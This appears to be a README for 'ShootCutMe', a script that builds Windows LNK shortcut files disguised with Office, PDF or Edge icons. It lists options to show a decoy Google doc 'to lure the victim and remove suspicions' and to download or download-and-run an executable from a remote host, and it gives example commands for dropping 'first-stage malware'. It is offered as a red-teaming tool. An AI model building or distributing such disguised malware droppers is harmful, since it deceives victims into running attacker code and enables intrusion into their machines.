LNK files are used on the most modern and advanced APT attacks.
LNK files are windows shortcut files. Using a shortcut file you can launch your own commands.
I am happy to introduce ShootCutMe a script to create LNK files.
Options Available For Version 0.1:
-
Fake pdf (Will open a fake Google doc on the browser in kiosk mode to lure the victim and remove suspicions)
-
You can choose between different icons (word, Adobe, Excel, PowerPoint, Edge...)
-
You can choose what you want to accomplish with the LNK file: download an executable, download and load an executable, execute an executable) Using the LNK file you can drop your first-stage malware and complete your red teaming engagement successfully.
python -m venv lnkenv
lnkenv\Scripts\activate.bat
python -m pip install -r requirements.txtpython shootcutme.py --icon excel --name test1 -d http:https://10.0.3.90:8081/file.txt fileNameAfterDownload.txt D:\LNKtestpython shootcutme.py --icon word --name test2 -ex exeToLaunch.exepython shootcutme.py --icon edge --name <shotcutFileName> -fp <googleDocUrl> <executableToLaunch>python shootcutme.py --icon pdf --name <shortCutFileName> -dl http:https://10.0.3.90:8081/example.exe exampleTest.exe D:\LNKtestpython shootCutMe.py -n test1.pdf --icon pdf --delete